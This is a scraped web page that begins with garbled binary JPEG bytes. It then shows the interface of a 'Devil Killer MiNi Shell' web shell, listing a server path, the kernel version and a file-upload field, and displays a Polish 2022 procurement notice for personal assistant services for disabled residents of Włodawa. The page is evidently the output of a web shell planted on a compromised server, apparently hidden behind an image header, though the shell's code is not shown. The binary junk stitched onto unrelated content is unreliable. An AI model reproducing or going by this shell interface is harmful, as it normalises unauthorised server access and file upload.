JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220606/0019432301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi asystenta osobistego osoby niepełnosprawnej <br/>na potrzeby mieszkańców Gminy Miejskiej Włodawa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 002681560</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. J. Piłsudskiego 41</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włodawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL811 - Bialski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">825721321</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mops@wlodawa.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mops.wlodawa.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka organizacyjna podległa pod JST, jednostka budżetowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi asystenta osobistego osoby niepełnosprawnej <br/>na potrzeby mieszkańców Gminy Miejskiej Włodawa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b8cc71e7-e314-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00194323</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039128/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usługi asystenta osobistego osoby niepełnosprawnej na potrzeby mieszkańców Gminy Miejskiej Włodawa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wlodawa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja elektroniczna m-dzy Zamawiającym a Wykonawcami odbywać się będzie za pomocą platformy https://platformazakupowa.pl/pn/wlodawa, która jest stroną prowadzonego postępowania. Sposób<br/>sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów<br/>z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415). Pozostałe informacje w rozdziale 11 SWZ. Dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia na https://platformazakupowa.pl/pn/wlodawa</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji użytkownika platformy zakupowej dostępnej na stronie:<br/>https://platformazakupowa.pl/strona/45-instrukcje. Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje; 3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0;<br/>4) włączona obsługa JavaScript; 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf; 6)<br/>szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3; 7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar; 8) maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. Pozostałe<br/>wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy zamieszczonym na stronie internetowej https://platformazakupowa.pl/strona/1-regulamin. Za datę przekazania oświadczeń, wniosków, zawiadomień, dokumentów elek, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich doręczenia za pośrednictwem formularza zamieszczonego na stronie profilu nabywcy https://platformazakupowa.pl/pn/wlodawa, w zakładce dedykowanej<br/>postępowaniu, poprzez kliknięcie przycisku -Wyślij wiadomość do zamawiającego, po którym pojawi się komunikat, że wiadomość<br/>została wysłana do Zamawiającego. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji-Komunikaty. Korespondencja, do konkretnego Wykonawcy, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy<br/>Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce-Wyślij wiadomość do zamawiającego). Ofertę składa się w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. Wykonawca składa ofertę za pośrednictwem Formularza do złożenia oferty dostępnego na platformie, tylko do upływu terminu składania ofert. Do oferty należy dołączyć wszystkie wymagane<br/>dokumenty wskazane w pkt 13.4. SWZ, w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Podpisy kwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać wymagania „Rozporządzenie<br/>Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS)(EU) nr 910/2014–od 1 lipca 2016 roku. W<br/>przypadku wykorzystania formatu podpisu XAdES zewnętrzny Zamawiający wymaga dołączenia odpowiedniej liczby plików, tj. podpisanych plików z danymi oraz plików podpisu w formacie XAdES. Więcej inform. w roz. 11 SWZ i sekcji IX ogłosz.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych jest Miejski Ośrodek Pomocy Społecznej we Włodawie, al. J. Piłsudskiego 41, 22-200 Włodawa, tel. 82/ 57 21 321, e-mail: mops@wlodawa.eu. Inspektor Ochrony Danych: Wyznaczyliśmy Inspektora Ochrony Danych, z którym może się Pani/Pan skontaktować w sprawach ochrony swoich danych osobowych i realizacji swoich praw przez e-mail: inspektor@cbi24.pl lub pisemnie na adres siedziby wskazany w pkt 1. Dane przetwarza się w następujących celach: 1) związanych z postępowaniem o udzielenie zamówienia publicznego, w szczególności złożenie ofert, wybór najkorzystniejszej oferty, zawarcie i realizacja umowy, wykonanie przez administratora ciążących na nim obowiązków prawnych wynikających z faktu<br/>zawarcia umowy; 2) przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze art. 6 lit. c RODO; w celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.: MOPS.271.9.2022.GN „Świadczenie usługi asystenta osobistego osoby niepełnosprawnej na potrzeby mieszkańców Gminy Miejskiej Włodawa”<br/>prowadzonym w trybie zamówienia publicznego zgodnie z ustawą Prawo zamówień publicznych – procedura podstawowa. Odbiorcy danych: W związku z przetwarzaniem Pani/Pana danych osobowych w celach wskazanych w pkt 3, Pani/Pana dane osobowe mogą być udostępniane następującym odbiorcom bądź kategoriom odbiorców:1) podmiotom przetwarzającym dane osobowe, których administratorem jest Miejski Ośrodek Pomocy Społecznej we Włodawie na podstawie zawartych umów; 2) organom władzy publicznej oraz podmiotom wykonującym zadania publiczne lub działającym na zlecenie organów władzy publicznej, w zakresie i w<br/>celach, które wynikają z przepisów prawa. Dane osobowe przekazane przez Wykonawcę będą przechowywane, zgodnie z art. 97 ust. 1ustawy prawo zamówień publicznych, przez okres trwania zawartej umowy oraz w okresie przechowywania dokumentacji ustalonym zgodnie z odrębnymi przepisami. Nie przekazujemy Pani/Pana danych poza teren Polski, Europejskiego Obszaru Gospodarczego.8.w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO.9. Wykonawca posiada: − na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy; − na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników; − na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osob. z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego<br/>danych osobowych narusza przepisy RODO;W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa<br/>w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania publicznego ani zmianą umowy w zakresie niezgodnym z ustawą. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu. W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa<br/>w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego. Więcej inform. w roz.25 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawcy nie przysługuje: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO. Jeżeli uważa Pani/Pan, że przetwarzamy Pani/Pana dane niezgodnie z prawem, może Pani/Pan złożyć w tej sprawie skargę do Prezesa Urzędu Ochrony Danych Osobowych lub innego właściwego organu nadzorczego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOPS.271.9.2022.GN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 170300,00 </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamawiający w trybie art. 121 i art. 60 ustawy Pzp zastrzega obowiązek osobistego wykonania kluczowych zadań wyszczególnionych w pkt 4.1.1. SWZ, w zakresie dotyczącym przedmiotu zamówienia.<br/>W ramach każdej z 5 części zostanie wybrana 1 osoba świadcząca usługę asystenta osoby niepełnosprawnej.<br/>4.1.1. Opis przedmiotu zamówienia dla każdej z 5 części:<br/>Usługa asystenta osobistego osoby niepełnosprawnej ma na celu pomoc osobom niepełnosprawnym posiadającym orzeczenie o niepełnosprawności o stopniu znacznym lub o stopniu umiarkowanym albo traktowane na równi do wyżej wymienionych, zwanym „uczestnikami Programu”, w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym.<br/>Usługi asystencji osobistej mogą w szczególności polegać na pomocy asystenta w: 1) wykonywaniu czynności dnia codziennego dla uczestnika Programu; 2) wyjściu, powrocie lub dojazdach z uczestnikiem Programu w wybrane przez uczestnika miejsce; 3) załatwianiu spraw urzędowych; <br/> 4) korzystaniu z dóbr kultury (np. muzeum, teatr, kino, galerie sztuki, wystawy). Więcej informacji dot. przedmiotu zamówienia zawiera swz. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 34060,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla każdej części zamówienia oddzielnie. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/>C = Cn/Cb x 60 pkt gdzie, C – oznacza ilość punktów za kryterium cena,<br/>Cn – oznacza najniższą cenę ofertową spośród ofert nieodrzuconych,<br/>Cb – oznacza cenę oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. Kryterium „Termin płatności” będzie liczony w dniach. Wykonawca w formularzu ofertowym w pkt C.1 lit. c) zaoferuje termin płatności, na jaki wyraża zgodę przy wykonywaniu usługi. Maksymalny termin płatności, jaki może zaoferować Wykonawca to 30 dni<br/>zaś minimalny to 7 dni od dnia prawidłowo złożonej faktury/rachunku.<br/>W przypadku zaoferowania maksymalnej długości terminu płatności tj. 30 dni, Wykonawca otrzyma czterdzieści (40) punktów, pozostali Wykonawcy będą oceniani wg następującego wzoru: T = To/Tmax. x 40 pkt gdzie,<br/>T – oznacza wartość punktową, którą należy wyznaczyć,<br/>To – oznacza termin płatności podany w badanej ofercie,<br/>Tmax. – oznacza najdłuższy oferowany termin płatności (maksymalnie 30 dni). Jeżeli Wykonawca zaoferuje termin płatności dłuższy<br/>niż 30 dni, Zamawiający do oceny oferty przyjmie termin 30 dni i w przypadku wyboru oferty Wykonawcy, do umowy zostanie wpisany termin 30 dni.<br/>Jeżeli Wykonawca zaoferuje termin krótszy niż 7 dni od dnia prawidłowo złożonej faktury/rachunku, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Jeżeli Wykonawca nie poda (nie wpisze) w formularzu ofertowym terminu płatności to Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. Za najkorzystniejszą ofertę w zakresie<br/>każdej części zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru: O = C + T gdzie, O – oznacza łączną ilość punktów oferty ocenianej, C – oznacza liczbę punków uzyskanych w kryterium „Cena”, T – oznacza liczę punktów uzyskanych w kryterium „Termin płatności”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamawiający w trybie art. 121 i art. 60 ustawy Pzp zastrzega obowiązek osobistego wykonania kluczowych zadań wyszczególnionych w pkt 4.1.1. SWZ, w zakresie dotyczącym przedmiotu zamówienia. W ramach każdej z 5 części zostanie wybrana 1 osoba świadcząca usługę asystenta osoby niepełnosprawnej. 4.1.1. Opis przedmiotu zamówienia dla każdej z 5 części:<br/>Usługa asystenta osobistego osoby niepełnosprawnej ma na celu pomoc osobom niepełnosprawnym posiadającym orzeczenie o niepełnosprawności o stopniu znacznym lub o stopniu umiarkowanym albo traktowane na równi do wyżej wymienionych, zwanym „uczestnikami Programu”, w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym.<br/>Usługi asystencji osobistej mogą w szczególności polegać na pomocy asystenta w: 1) wykonywaniu czynności dnia codziennego dla uczestnika Programu; 2) wyjściu, powrocie lub dojazdach z uczestnikiem Programu w wybrane przez uczestnika miejsce; 3) załatwianiu spraw urzędowych; <br/> 4) korzystaniu z dóbr kultury (np. muzeum, teatr, kino, galerie sztuki, wystawy). Więcej informacji dot. przedmiotu zamówienia zawiera swz. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 34060,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: 